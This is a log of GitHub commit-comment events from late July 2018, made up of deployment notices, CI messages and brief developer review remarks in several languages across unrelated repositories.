{"id":"8031966162","type":"CommitCommentEvent","actor":{"login":"TeamDynasty"},"repo":{"name":"TeamDynasty/-"},"payload":{"comment":{"id":29867580,"position":null,"line":null,"path":null,"commit_id":"28ab09b12339ed9d29f16fa6b8f4b1a563388325","created_at":"2018-07-28T09:14:31Z","updated_at":"2018-07-28T09:14:31Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-28T09:14:31Z"}
{"id":"8031966647","type":"CommitCommentEvent","actor":{"login":"CaraBelvez1"},"repo":{"name":"CaraBelvez1/ikonnect2018"},"payload":{"comment":{"id":29867581,"position":null,"line":null,"path":null,"commit_id":"66990a43cd25f2b77794ab1fac247f2fe6623ab3","created_at":"2018-07-28T09:14:54Z","updated_at":"2018-07-28T09:14:54Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/27e98655-0b38-45a3-96f4-6fa9175aabe4?env_id=ibm%3Ayp%3Aus-south \"iKonnect-Cara Belvez\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/0aa97578-afa2-40f8-8237-5667a4f7713a?env_id=ibm%3Ayp%3Aus-south \"iKonnect-Cara\") deployed [ikonnect2018](https://github.com/CaraBelvez1/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-parascc-ph.ibm.com-iKonnect-Cara-20180728-091454 \"deploy-ibm-yp-us-south-parascc-ph.ibm.com-iKonnect-Cara-20180728-091454\") to [iKonnect-Cara](https://console.bluemix.net/apps/964fdaf5-fcc2-4612-bfb9-4b6d18ecc092?env_id=ibm:yp:us-south \"ibm:yp:us-south:parascc@ph.ibm.com:iKonnect-Cara\"), including this commit"}},"created_at":"2018-07-28T09:14:54Z"}
{"id":"8031968769","type":"CommitCommentEvent","actor":{"login":"allenqc"},"repo":{"name":"allenqc/ikonnect2018"},"payload":{"comment":{"id":29867586,"position":null,"line":null,"path":null,"commit_id":"7d979f3ff4660a34b082717f51610cd6e9a81125","created_at":"2018-07-28T09:16:37Z","updated_at":"2018-07-28T09:16:37Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/4456ae1b-93c7-4e12-b28d-168c156fc1a9?env_id=ibm%3Ayp%3Aus-south \"iKonnect-AllenCampano\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/870c5335-6ae3-4b94-93a6-279ea14f0988?env_id=ibm%3Ayp%3Aus-south \"IKonnectPipeline\") deployed [ikonnect2018](https://github.com/allenqc/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-campanoaq-ph.ibm.com-dev-US-20180728-091636 \"deploy-ibm-yp-us-south-campanoaq-ph.ibm.com-dev-US-20180728-091636\") to [dev-US](https://console.bluemix.net/apps/d637f90f-2883-473e-970f-fc7b607d9e56?env_id=ibm:yp:us-south \"ibm:yp:us-south:campanoaq@ph.ibm.com:dev-US\"), including this commit"}},"created_at":"2018-07-28T09:16:37Z"}
{"id":"8031971342","type":"CommitCommentEvent","actor":{"login":"adrianeusebio17"},"repo":{"name":"adrianeusebio17/ikonnect2018"},"payload":{"comment":{"id":29867589,"position":null,"line":null,"path":null,"commit_id":"f46a5fe02b2bbfd7ffc542489f2895f1b2df6ae3","created_at":"2018-07-28T09:18:46Z","updated_at":"2018-07-28T09:18:46Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/7df30199-f8e4-46fb-80a3-f299a293b26b?env_id=ibm%3Ayp%3Aus-south \"iKonnect-Adrian\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/f91d5dc7-8821-49b4-9e7c-533d50c90992?env_id=ibm%3Ayp%3Aus-south \"Adrian-iKonnect\") deployed [ikonnect2018](https://github.com/adrianeusebio17/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-adrian-eusebio-adrian-eusebio-20180728-091846 \"deploy-ibm-yp-us-south-adrian-eusebio-adrian-eusebio-20180728-091846\") to [adrian-eusebio](https://console.bluemix.net/apps/5935bca3-5e67-43f9-bf94-d695862896a7?env_id=ibm:yp:us-south \"ibm:yp:us-south:adrian-eusebio:adrian-eusebio\"), including this commit"}},"created_at":"2018-07-28T09:18:46Z"}
{"id":"8031972310","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29867593,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-28T09:19:38Z","updated_at":"2018-07-28T09:19:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T09:19:38Z"}
{"id":"8031973483","type":"CommitCommentEvent","actor":{"login":"alexey-lysiuk"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29867594,"position":null,"line":null,"path":null,"commit_id":"79f0deaff4a3ab878d563cb1046b22d8d8334651","created_at":"2018-07-28T09:20:40Z","updated_at":"2018-07-28T09:20:40Z","author_association":"COLLABORATOR","body":"I merged this change because everything I tested worked fine in Ubuntu VM."}},"created_at":"2018-07-28T09:20:40Z"}
{"id":"8031974929","type":"CommitCommentEvent","actor":{"login":"angawdi"},"repo":{"name":"angawdi/another-trivial-practice"},"payload":{"comment":{"id":29867595,"position":3,"line":3,"path":"README.md","commit_id":"36eb055849eb30f2ef140c22859a3a7c40b80216","created_at":"2018-07-28T09:21:53Z","updated_at":"2018-07-28T09:21:53Z","author_association":"OWNER","body":"funny"}},"created_at":"2018-07-28T09:21:53Z"}
{"id":"8031989818","type":"CommitCommentEvent","actor":{"login":"rurban"},"repo":{"name":"rurban/smhasher"},"payload":{"comment":{"id":29867631,"position":null,"line":null,"path":null,"commit_id":"bde0208400a24461e4ac7923dae01c7f9b6dc373","created_at":"2018-07-28T09:33:57Z","updated_at":"2018-07-28T09:33:57Z","author_association":"OWNER","body":"I see. But we don't need to separate optimized implementations of the same hash. \r\nt1ha does it, but others don't need to. It might be convenient, but is not mandatory.\r\nFarmHash is Google's choice of hash, the replacement of CityHash."}},"created_at":"2018-07-28T09:33:57Z"}
{"id":"8031990346","type":"CommitCommentEvent","actor":{"login":"perminder-klair"},"repo":{"name":"get-stackable/stackable-ui"},"payload":{"comment":{"id":29867632,"position":4,"line":39,"path":"package.json","commit_id":"183e46431eeb91f099359a4b7232b2dd6ed5da0d","created_at":"2018-07-28T09:34:23Z","updated_at":"2018-07-28T09:34:23Z","author_association":"MEMBER","body":"Is it good module?"}},"created_at":"2018-07-28T09:34:23Z"}
{"id":"8031992658","type":"CommitCommentEvent","actor":{"login":"LinuxCrafts"},"repo":{"name":"LinuxCrafts/Custom-Protocol-handler-creator"},"payload":{"comment":{"id":29867636,"position":1,"line":1,"path":"LICENSE","commit_id":"de28a01adbe4cbfacf44d349df61fc136946cf44","created_at":"2018-07-28T09:36:19Z","updated_at":"2018-07-28T09:36:19Z","author_association":"OWNER","body":"yes i did change the license to the GGPL"}},"created_at":"2018-07-28T09:36:19Z"}
{"id":"8031993472","type":"CommitCommentEvent","actor":{"login":"HoshinoTented"},"repo":{"name":"HoshinoTented/LearningCpp"},"payload":{"comment":{"id":29867638,"position":14,"line":14,"path":"src/4.6_Member_Access_Operator.h","commit_id":"4ff9e21127cbe09fc3de907d27baea61772acea7","created_at":"2018-07-28T09:37:02Z","updated_at":"2018-07-28T09:37:02Z","author_association":"OWNER","body":"这个似书里的内容emmmmm\r\n所以就照抄下来了。。"}},"created_at":"2018-07-28T09:37:02Z"}
{"id":"8031993519","type":"CommitCommentEvent","actor":{"login":"LinuxCrafts"},"repo":{"name":"LinuxCrafts/Custom-Protocol-handler-creator"},"payload":{"comment":{"id":29867639,"position":1,"line":1,"path":"LICENSE","commit_id":"de28a01adbe4cbfacf44d349df61fc136946cf44","created_at":"2018-07-28T09:37:05Z","updated_at":"2018-07-28T09:37:05Z","author_association":"OWNER","body":"do not bother reading the old licence;\r\nits bad as heeeck"}},"created_at":"2018-07-28T09:37:05Z"}
{"id":"8031993618","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29867640,"position":null,"line":null,"path":null,"commit_id":"1ad71293c511edb4090f945e32a6c366759b124d","created_at":"2018-07-28T09:37:11Z","updated_at":"2018-07-28T09:37:11Z","author_association":"OWNER","body":"Hi Stefan, thank you for checking. This is obviously my fault, so don't worry."}},"created_at":"2018-07-28T09:37:11Z"}
{"id":"8031994230","type":"CommitCommentEvent","actor":{"login":"jeromekelleher"},"repo":{"name":"petrelharp/treestats_ms"},"payload":{"comment":{"id":29867642,"position":4,"line":4,"path":"treestats/weighted_trees.py","commit_id":"ecd736be9e3baf4f2e3419395905cbb40e95d097","created_at":"2018-07-28T09:37:40Z","updated_at":"2018-07-28T09:37:40Z","author_association":"COLLABORATOR","body":"Neat!!!"}},"created_at":"2018-07-28T09:37:40Z"}
{"id":"8031994435","type":"CommitCommentEvent","actor":{"login":"h-youhei"},"repo":{"name":"h-youhei/qmk_firmware"},"payload":{"comment":{"id":29867644,"position":null,"line":null,"path":null,"commit_id":"22f4b3c250cc9f17d396f38f64a5c94d9fb78114","created_at":"2018-07-28T09:37:52Z","updated_at":"2018-07-28T09:37:52Z","author_association":"OWNER","body":"close #1"}},"created_at":"2018-07-28T09:37:52Z"}
{"id":"8031994479","type":"CommitCommentEvent","actor":{"login":"HoshinoTented"},"repo":{"name":"HoshinoTented/LearningCpp"},"payload":{"comment":{"id":29867645,"position":10,"line":10,"path":"src/3.4_Iterable.h","commit_id":"4ff9e21127cbe09fc3de907d27baea61772acea7","created_at":"2018-07-28T09:37:54Z","updated_at":"2018-07-28T09:37:54Z","author_association":"OWNER","body":"书里的内容emmm\r\n所有的x.x_xxxx.h的文件都是书里的内容\r\n只有类似于x.x.x.h的才是练习"}},"created_at":"2018-07-28T09:37:54Z"}
{"id":"8031997139","type":"CommitCommentEvent","actor":{"login":"HoshinoTented"},"repo":{"name":"HoshinoTented/LearningCpp"},"payload":{"comment":{"id":29867646,"position":10,"line":10,"path":"src/3.4_Iterable.h","commit_id":"4ff9e21127cbe09fc3de907d27baea61772acea7","created_at":"2018-07-28T09:40:10Z","updated_at":"2018-07-28T09:40:10Z","author_association":"OWNER","body":"书里会这么写估计是因为学到了这部分的内容, 所以尝试用学到的东西来写\r\n当然星野实战中不会这么写（大概"}},"created_at":"2018-07-28T09:40:10Z"}
{"id":"8032003253","type":"CommitCommentEvent","actor":{"login":"janisozaur"},"repo":{"name":"switchbrew/libnx"},"payload":{"comment":{"id":29867658,"position":4,"line":434,"path":"nx/source/services/fs.c","commit_id":"18a841c8504efd64c5ace9e897795953a69ec026","created_at":"2018-07-28T09:45:35Z","updated_at":"2018-07-28T09:45:35Z","author_association":"NONE","body":"Why set 0 explicitly? Why not just ` = {}`?"}},"created_at":"2018-07-28T09:45:35Z"}
{"id":"8032003826","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"rurban/smhasher"},"payload":{"comment":{"id":29867659,"position":null,"line":null,"path":null,"commit_id":"bde0208400a24461e4ac7923dae01c7f9b6dc373","created_at":"2018-07-28T09:46:06Z","updated_at":"2018-07-28T09:46:06Z","author_association":"CONTRIBUTOR","body":"The problem is that the some implementation(s) return different result(s), for instance the AES-NI based code."}},"created_at":"2018-07-28T09:46:06Z"}
{"id":"8032003855","type":"CommitCommentEvent","actor":{"login":"khuyen94"},"repo":{"name":"khuyen94/takeatrip"},"payload":{"comment":{"id":29867660,"position":null,"line":null,"path":null,"commit_id":"e3838f7f04c5e7472f6d8800cf8bfbd40cdb3631","created_at":"2018-07-28T09:46:08Z","updated_at":"2018-07-28T09:46:08Z","author_association":"OWNER","body":"revert to change path image"}},"created_at":"2018-07-28T09:46:08Z"}
{"id":"8032003880","type":"CommitCommentEvent","actor":{"login":"kmaksimovv"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867661,"position":2,"line":8,"path":"Lesson_2/day_serial_number.rb","commit_id":"e9e0e39e9d4515e974552643e1b39c8b58045ce1","created_at":"2018-07-28T09:46:09Z","updated_at":"2018-07-28T09:46:09Z","author_association":"OWNER","body":"Это не индекс,это как раз вычисляется номер месяца,предшествующий месяцу введенного месяца,чтобы посчитать сумму числа дней за все предыдущие месяцы и прибавить к  этой сумме число(то есть номер дня),которое ввел юзер .\r\n "}},"created_at":"2018-07-28T09:46:09Z"}
{"id":"8032004933","type":"CommitCommentEvent","actor":{"login":"liqiaozi"},"repo":{"name":"liqiaozi/springcloud-service"},"payload":{"comment":{"id":29867664,"position":null,"line":null,"path":null,"commit_id":"6eb2bd5b956c299423d43befd37edd337c5a855a","created_at":"2018-07-28T09:47:05Z","updated_at":"2018-07-28T09:47:05Z","author_association":"OWNER","body":"init file"}},"created_at":"2018-07-28T09:47:05Z"}
{"id":"8032006036","type":"CommitCommentEvent","actor":{"login":"indianprogrammer"},"repo":{"name":"indianprogrammer/navyug_school"},"payload":{"comment":{"id":29867668,"position":3,"line":255,"path":"application/modules/account/controllers/Account.php","commit_id":"ca64bcf43a4163b4ed85d6bc5681dd2f514851aa","created_at":"2018-07-28T09:48:04Z","updated_at":"2018-07-28T09:48:04Z","author_association":"OWNER","body":"check this query SELECT COALESCE(MAX(invoice_id),0) as invoice_id FROM `invoices` WHERE school_id =2 \r\n"}},"created_at":"2018-07-28T09:48:04Z"}
{"id":"8032009968","type":"CommitCommentEvent","actor":{"login":"onmax"},"repo":{"name":"onmax/notificationJS"},"payload":{"comment":{"id":29867674,"position":null,"line":null,"path":null,"commit_id":"75b5e6940676f138d6f1b05e9bcd312cadecb05f","created_at":"2018-07-28T09:51:35Z","updated_at":"2018-07-28T09:51:35Z","author_association":"OWNER","body":"Grax"}},"created_at":"2018-07-28T09:51:35Z"}
{"id":"8032010400","type":"CommitCommentEvent","actor":{"login":"amio"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29867677,"position":null,"line":null,"path":null,"commit_id":"55970a895d56e96871886d73a41e003bc31050be","created_at":"2018-07-28T09:51:59Z","updated_at":"2018-07-28T09:51:59Z","author_association":"OWNER","body":"Hi @tusbar I've removed `simple-icons`, copied it's `mozillafirefox.svg` and `googlechrome.svg` to Badgen's icon folder as `firefox.svg` & `chrome.svg`. 3264465b3b08c90eb1068f618a8ac8a0b6ca83a9\r\n\r\nWith this change, we can make sure every icon get reviewed before it's available online, ensure high quality results in visual consistency & stability.\r\n\r\nCurrently you can preview it at badgen-canary.now.sh:\r\nhttps://badgen-canary.now.sh/badge/mozilla%20add-on/v1.8.0?icon=firefox"}},"created_at":"2018-07-28T09:51:59Z"}
{"id":"8032011288","type":"CommitCommentEvent","actor":{"login":"matthid"},"repo":{"name":"fsprojects/Paket"},"payload":{"comment":{"id":29867681,"position":7,"line":20,"path":"src/Paket.Core/PaketConfigFiles/PackagesConfigFile.fs","commit_id":"833b36c13a37d13b5503ff3c36ebf9de4f526a22","created_at":"2018-07-28T09:52:46Z","updated_at":"2018-07-28T09:52:46Z","author_association":"MEMBER","body":"I think this has changed behavior because `packages.config` will never contain `[]` and in particular it has changed `convert-from-nuget` (and some tests)."}},"created_at":"2018-07-28T09:52:46Z"}
{"id":"8032011926","type":"CommitCommentEvent","actor":{"login":"download-official-app-billing-software"},"repo":{"name":"download-official-app-billing-software/download"},"payload":{"comment":{"id":29867685,"position":1,"line":1,"path":"index.md","commit_id":"f45e3a56b2e529bd2cbab3a79678c1462000777f","created_at":"2018-07-28T09:53:21Z","updated_at":"2018-07-28T09:53:21Z","author_association":"OWNER","body":"app download page"}},"created_at":"2018-07-28T09:53:21Z"}
{"id":"8032014266","type":"CommitCommentEvent","actor":{"login":"vincent6767"},"repo":{"name":"harlow/kinesis-consumer"},"payload":{"comment":{"id":29867688,"position":89,"line":89,"path":"client.go","commit_id":"b875bb56e738bcaa13b5e609b3d371d5ab75959e","created_at":"2018-07-28T09:55:05Z","updated_at":"2018-07-28T09:55:05Z","author_association":"CONTRIBUTOR","body":"@harlow \r\nWhy are we trying to get the shard iterator? The `NextShardIterator` is null if the shard is closed hence we don't need to try to get the shard iterator."}},"created_at":"2018-07-28T09:55:05Z"}
{"id":"8032015041","type":"CommitCommentEvent","actor":{"login":"matthid"},"repo":{"name":"fsprojects/Paket"},"payload":{"comment":{"id":29867689,"position":7,"line":20,"path":"src/Paket.Core/PaketConfigFiles/PackagesConfigFile.fs","commit_id":"833b36c13a37d13b5503ff3c36ebf9de4f526a22","created_at":"2018-07-28T09:55:43Z","updated_at":"2018-07-28T09:55:43Z","author_association":"MEMBER","body":"Will revert this in https://github.com/fsprojects/Paket/pull/3307 in an attempt to get the CI green again ..."}},"created_at":"2018-07-28T09:55:43Z"}
{"id":"8032015460","type":"CommitCommentEvent","actor":{"login":"maksimovkv"},"repo":{"name":"kmaksimovv/testfile"},"payload":{"comment":{"id":29867690,"position":null,"line":null,"path":null,"commit_id":"da9997f1063b2e68cd12f4b837e3d9c442354717","created_at":"2018-07-28T09:56:00Z","updated_at":"2018-07-28T09:56:00Z","author_association":"CONTRIBUTOR","body":"обратный тест\n\nсб, 28 июл. 2018 г. в 13:07, kmaksimovv <notifications@github.com>:\n\n> go test\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kmaksimovv/testfile/commit/da9997f1063b2e68cd12f4b837e3d9c442354717#commitcomment-29867555>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AXJYHB2iWQ8EsylBxHxvEMfcAWMnYxI-ks5uLCnkgaJpZM4Vk99f>\n> .\n>\n\n\n-- \nC уважением,\nМаксимов Константин\n"}},"created_at":"2018-07-28T09:56:00Z"}
{"id":"8032019338","type":"CommitCommentEvent","actor":{"login":"maksimovkv"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867707,"position":2,"line":8,"path":"Lesson_2/day_serial_number.rb","commit_id":"e9e0e39e9d4515e974552643e1b39c8b58045ce1","created_at":"2018-07-28T09:59:18Z","updated_at":"2018-07-28T09:59:18Z","author_association":"CONTRIBUTOR","body":"Это не индекс,это как раз вычисляется номер месяца,предшествующий месяцу\r\nвведенного месяца,чтобы посчитать сумму числа дней за все предыдущие месяцы\r\nи прибавить к этой сумме число(то есть номер дня),которое ввел юзер .\r\n\r\nсб, 28 июл. 2018 г. в 11:22, max-underthesun <notifications@github.com>:\r\n\r\n> лучше все же хранить не индекс, \"реальный номер\" месяца\r\n> это более логично, приближенно к реальности, да и переменая называется\r\n> month, а не month_index\r\n> индекс стоит вычислять где-то ближе к точке, в которой он понадобится\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/kmaksimovv/thinknetica/commit/e9e0e39e9d4515e974552643e1b39c8b58045ce1#commitcomment-29867184>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AXJYHKnm2ZtDrJAcuB6Vxjlppo4bkY0eks5uLBEcgaJpZM4Vk8O0>\r\n> .\r\n>\r\n\r\n\r\n-- \r\nC уважением,\r\nМаксимов Константин\r\n"}},"created_at":"2018-07-28T09:59:18Z"}
{"id":"8033099222","type":"CommitCommentEvent","actor":{"login":"Stylite"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29871480,"position":null,"line":null,"path":null,"commit_id":"b55d716eee660ad0443ba6276e9190f36d4d588e","created_at":"2018-07-29T00:00:33Z","updated_at":"2018-07-29T00:00:33Z","author_association":"MEMBER","body":"How much did you get paid for this"}},"created_at":"2018-07-29T00:00:33Z"}
{"id":"8033101099","type":"CommitCommentEvent","actor":{"login":"nick-2017"},"repo":{"name":"pterodactyl/documentation"},"payload":{"comment":{"id":29871484,"position":null,"line":null,"path":null,"commit_id":"139c653377b88ca74429e2b7d5f7c2893c482a6f","created_at":"2018-07-29T00:02:23Z","updated_at":"2018-07-29T00:02:23Z","author_association":"CONTRIBUTOR","body":"Certbot mentions using the \"certbot\" package instead of \"letsencrypt\"\r\nhttps://certbot.eff.org/lets-encrypt/ubuntuxenial-other"}},"created_at":"2018-07-29T00:02:23Z"}
{"id":"8033101759","type":"CommitCommentEvent","actor":{"login":"killer00760"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29871485,"position":1,"line":1,"path":"README.md","commit_id":"f505443393caf619f2c5dbbbf6226c9e271c82e5","created_at":"2018-07-29T00:03:04Z","updated_at":"2018-07-29T00:03:04Z","author_association":"NONE","body":"Nice"}},"created_at":"2018-07-29T00:03:04Z"}
{"id":"8033107026","type":"CommitCommentEvent","actor":{"login":"jhyunleehi"},"repo":{"name":"jhyunleehi/SW"},"payload":{"comment":{"id":29871502,"position":27,"line":27,"path":"1/1291.c","commit_id":"e59dda79057076bda109b93b504bd1a6abd30bb6","created_at":"2018-07-29T00:08:40Z","updated_at":"2018-07-29T00:08:40Z","author_association":"OWNER","body":"이부분이 필요 없음"}},"created_at":"2018-07-29T00:08:40Z"}
{"id":"8033109135","type":"CommitCommentEvent","actor":{"login":"jhyunleehi"},"repo":{"name":"jhyunleehi/SW"},"payload":{"comment":{"id":29871509,"position":null,"line":null,"path":null,"commit_id":"439c5f41f7fc76cd44fa2e3b8c1251bd6e708379","created_at":"2018-07-29T00:10:52Z","updated_at":"2018-07-29T00:10:52Z","author_association":"OWNER","body":"불필요한 중복 코드는 제거함"}},"created_at":"2018-07-29T00:10:52Z"}
{"id":"8033109261","type":"CommitCommentEvent","actor":{"login":"Mitch9378"},"repo":{"name":"Mitch9378/AmazeFileManager"},"payload":{"comment":{"id":29871510,"position":null,"line":null,"path":null,"commit_id":"207e4d188332033752712ef216e2fd28d78fb489","created_at":"2018-07-29T00:10:59Z","updated_at":"2018-07-29T00:10:59Z","author_association":"OWNER","body":"I am not sure if I handled this license correctly. Please let me know if I need to change anything. "}},"created_at":"2018-07-29T00:10:59Z"}
{"id":"8033109293","type":"CommitCommentEvent","actor":{"login":"kaneofarrell"},"repo":{"name":"kaneofarrell/NumpyGUI"},"payload":{"comment":{"id":29871511,"position":null,"line":null,"path":null,"commit_id":"6e72204d3dc0d6dbb3ded526933e0c1133c0b17a","created_at":"2018-07-29T00:11:01Z","updated_at":"2018-07-29T00:11:01Z","author_association":"OWNER","body":"setup file for building exe"}},"created_at":"2018-07-29T00:11:01Z"}
{"id":"8033113507","type":"CommitCommentEvent","actor":{"login":"lassoan"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29871527,"position":25,"line":52,"path":"Modules/Loadable/Markups/MRML/vtkMRMLMarkupsFiducialStorageNode.cxx","commit_id":"7df26d7925faea88fc1b302082d6c186ffdbe458","created_at":"2018-07-29T00:15:26Z","updated_at":"2018-07-29T00:15:26Z","author_association":"CONTRIBUTOR","body":"Great, thanks! "}},"created_at":"2018-07-29T00:15:26Z"}
{"id":"8033114241","type":"CommitCommentEvent","actor":{"login":"AriDEV"},"repo":{"name":"ProjectSkyfire/SkyFire.548"},"payload":{"comment":{"id":29871529,"position":null,"line":null,"path":null,"commit_id":"a86cdffa2ce033c7f291b89587153f5ce091e7df","created_at":"2018-07-29T00:16:11Z","updated_at":"2018-07-29T00:16:11Z","author_association":"MEMBER","body":"TRUNCATION WARNING! do not use it on non sfdb."}},"created_at":"2018-07-29T00:16:11Z"}
{"id":"8033114275","type":"CommitCommentEvent","actor":{"login":"jhyunleehi"},"repo":{"name":"jhyunleehi/SW"},"payload":{"comment":{"id":29871530,"position":27,"line":27,"path":"1/1291.c","commit_id":"e59dda79057076bda109b93b504bd1a6abd30bb6","created_at":"2018-07-29T00:16:14Z","updated_at":"2018-07-29T00:16:14Z","author_association":"OWNER","body":"그런것 같음"}},"created_at":"2018-07-29T00:16:14Z"}
{"id":"8033116297","type":"CommitCommentEvent","actor":{"login":"lgtyqz"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29871534,"position":null,"line":null,"path":null,"commit_id":"cd859e4c7001c69ca2a949ccef8e791662a41ecb","created_at":"2018-07-29T00:18:21Z","updated_at":"2018-07-29T00:18:21Z","author_association":"CONTRIBUTOR","body":"**clap* *clap**\r\nnice work. How'd you do it?"}},"created_at":"2018-07-29T00:18:21Z"}
{"id":"8033116914","type":"CommitCommentEvent","actor":{"login":"zufuliu"},"repo":{"name":"zufuliu/notepad2"},"payload":{"comment":{"id":29871535,"position":null,"line":null,"path":null,"commit_id":"b7ad639fa6e576db2df04ce72e2b69f409f386bd","created_at":"2018-07-29T00:19:06Z","updated_at":"2018-07-29T00:19:06Z","author_association":"OWNER","body":"See also https://github.com/XhmikosR/notepad2-mod/issues/211 and https://github.com/rizonesoft/Notepad3/issues/361."}},"created_at":"2018-07-29T00:19:06Z"}
{"id":"8033118477","type":"CommitCommentEvent","actor":{"login":"jebuskrust"},"repo":{"name":"tootsuite/mastodon"},"payload":{"comment":{"id":29871539,"position":null,"line":null,"path":null,"commit_id":"9ad334f65c4391e04928c070714b43efc14b9658","created_at":"2018-07-29T00:20:40Z","updated_at":"2018-07-29T00:20:40Z","author_association":"NONE","body":"Thank you, fixed my issue. "}},"created_at":"2018-07-29T00:20:40Z"}
{"id":"8033127550","type":"CommitCommentEvent","actor":{"login":"lepon01"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29871566,"position":null,"line":null,"path":null,"commit_id":"b55d716eee660ad0443ba6276e9190f36d4d588e","created_at":"2018-07-29T00:30:18Z","updated_at":"2018-07-29T00:30:18Z","author_association":"MEMBER","body":"I am unable to comment."}},"created_at":"2018-07-29T00:30:18Z"}
{"id":"8033127970","type":"CommitCommentEvent","actor":{"login":"Stylite"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29871567,"position":null,"line":null,"path":null,"commit_id":"b55d716eee660ad0443ba6276e9190f36d4d588e","created_at":"2018-07-29T00:30:43Z","updated_at":"2018-07-29T00:30:43Z","author_association":"MEMBER","body":"Oh."}},"created_at":"2018-07-29T00:30:43Z"}
{"id":"8033128159","type":"CommitCommentEvent","actor":{"login":"gpleiss"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29871568,"position":null,"line":null,"path":null,"commit_id":"6bc1a99d7470215ac931fe2fc4126776eb2ffca8","created_at":"2018-07-29T00:30:54Z","updated_at":"2018-07-29T00:30:54Z","author_association":"COLLABORATOR","body":"@Balandat @darbour @jacobrgardner see #208 for updated notebook. I also opened #209 for discussion on an interface to make it pretty."}},"created_at":"2018-07-29T00:30:54Z"}
{"id":"8033129685","type":"CommitCommentEvent","actor":{"login":"racha999"},"repo":{"name":"Racha989/super-doodle"},"payload":{"comment":{"id":29871572,"position":null,"line":null,"path":null,"commit_id":"073af72c23b7bc78ee8c8fd3950e2dbf04ac0dc5","created_at":"2018-07-29T00:32:27Z","updated_at":"2018-07-29T00:32:27Z","author_association":"MEMBER","body":"Any body can recommend me whic one is true ?\r\n"}},"created_at":"2018-07-29T00:32:27Z"}
{"id":"8033130147","type":"CommitCommentEvent","actor":{"login":"janeegame"},"repo":{"name":"janeegame/My-Girl"},"payload":{"comment":{"id":29871574,"position":1,"line":1,"path":"LICENSE.md/.gitignore/README.md","commit_id":"6bddf6556290ac91add0561a2df4e8671964d8d7","created_at":"2018-07-29T00:32:54Z","updated_at":"2018-07-29T00:32:54Z","author_association":"OWNER","body":"hi girl"}},"created_at":"2018-07-29T00:32:54Z"}
{"id":"8033130784","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29871575,"position":null,"line":null,"path":null,"commit_id":"71d590026d42d1d4fda57004c373d1b3692cf99e","created_at":"2018-07-29T00:33:30Z","updated_at":"2018-07-29T00:33:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Routes for Employee](https://trello.com/c/SwVOLGKr/18-routes-for-employee)"}},"created_at":"2018-07-29T00:33:30Z"}
{"id":"8033138827","type":"CommitCommentEvent","actor":{"login":"handgo"},"repo":{"name":"Morpheus1123/ZeroS-vapoursynth-template"},"payload":{"comment":{"id":29871601,"position":null,"line":null,"path":null,"commit_id":"ce5b0eb77bbb89a5cc2ab2de7c3b38357f0b7629","created_at":"2018-07-29T00:42:13Z","updated_at":"2018-07-29T00:42:13Z","author_association":"NONE","body":"滤镜包连接好像失败了，能重新分享下吗?谢谢！"}},"created_at":"2018-07-29T00:42:13Z"}
{"id":"8033141031","type":"CommitCommentEvent","actor":{"login":"Devoxin"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29871606,"position":null,"line":null,"path":null,"commit_id":"b55d716eee660ad0443ba6276e9190f36d4d588e","created_at":"2018-07-29T00:44:41Z","updated_at":"2018-07-29T00:44:41Z","author_association":"CONTRIBUTOR","body":"I call this bold and brash"}},"created_at":"2018-07-29T00:44:41Z"}
